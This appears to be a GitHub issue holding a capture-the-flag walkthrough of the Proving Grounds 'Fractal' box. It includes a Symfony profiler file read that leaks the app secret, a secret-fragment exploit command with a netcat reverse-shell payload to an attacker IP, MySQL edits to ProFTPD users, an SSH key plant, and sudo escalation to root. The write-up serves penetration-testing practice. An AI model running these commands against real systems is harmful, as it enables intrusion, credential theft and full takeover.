WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Fractal (easy) #13

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

Key points:

[PE]

WDavid404 commented 4 months ago
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 61 ProFTPD
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/app_dev.php /app_dev.php/*
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Welcome!
|_http-favicon: Unknown favicon MD5: 231567A8CC45C2CF966C4E8D99A5B7FD

Regarding to 80 port, http://192.168.243.233/phpmyadmin/index.php
--> try some common credentials --> didn:t work

http://192.168.243.233/robots.txt -->

Disallow: /app_dev.php
Disallow: /app_dev.php/*

ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.233/app_dev.php/FUZZ ---> no info

See /app_dev.php --> Symfony 3.4.46 image

Also try FLI on GET /app_dev.php/_profiler/open?file=§a§ --> didn:t work.

According to the article , we can read app/config/parameters.yml http://192.168.243.233/app_dev.php/_profiler/open?file=app/config/parameters.yml -->

parameters:
    database_host: 127.0.0.1
    database_port: 3306
    database_name: symfony
    database_user: symfony
    database_password: symfony_db_password
    mailer_transport: smtp
    mailer_host: 127.0.0.1
    mailer_user: null
    mailer_password: null
    secret: 48a8538e6260789558f0dfe29861c05b

search Symfony 3.4.46 exploit --> https://github.com/ambionics/symfony-exploits/tree/main

python3 secret_fragment_exploit.py 'http://192.168.161.233/_fragment' --method 2 --secret '48a8538e6260789558f0dfe29861c05b' --algo 'sha256' --internal-url 'http://192.168.161.233/_fragment' --function system --parameters 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.222 80 >/tmp/f' --> image Access the URL above, i got a reverse shell from the target host. image

PE:

cd /etc/proftpd
ls
cat sql.conf

image

python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
mysql -u proftpd  -pprotfpd_with_MYSQL_password
show databases;
use proftpd;
show tables;
select * from ftpuser;

image image

Refer to: https://medium.com/@nico26deo/how-to-set-up-proftpd-with-a-mysql-backend-on-ubuntu-c6f23a638caf Password in the passwd field should be encrypted, to do so you can use this snippet (on your Terminal) to generate the password string you can paste into the passwd field: /bin/echo "{md5}"/bin/echo -n "password" | openssl dgst -binary -md5 | openssl enc -base64 --> {md5}X03MO1qnZdYdgyfeuILPmQ== image

we can update current www user or add a beniot user.

update ftpuser set passwd='{md5}X03MO1qnZdYdgyfeuILPmQ==' where id = 1;
update ftpuser set homedir='/' where id = 1;
update ftpuser set shell='/bin/bash' where id = 1;
update ftpuser set uid=1000,gid=1000 where id=1;

Refer to https://medium.com/@ardian.danny/oscp-practice-series-19-proving-grounds-fractal-4239c06a0dc8

INSERT INTOftpuser(id,userid,passwd,uid,gid,homedir,shell,count,accessed,modified) VALUES (2, 'benoit', '{md5}X03MO1qnZdYdgyfeuILPmQ==', '1000', '1000', '/', '/bin/bash', '0', '2022-12-05 05:26:29', '2022-12-12 05:26:29'); (According to /etc/passwd, we knew that benoit's uid and gid are1000,1000) image

ftp benoit@192.168.161.233 (pwd is "password") -->

cd /home/benoit
mkdir .ssh
put authorized_keys  

then, ssh -i ~/.ssh/id_ed25519 benoit@192.168.161.233 -->

$ sudo -l
Matching Defaults entries for benoit on fractal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User benoit may run the following commands on fractal:
    (ALL) NOPASSWD: ALL

so, run "sudo su" to switch to root .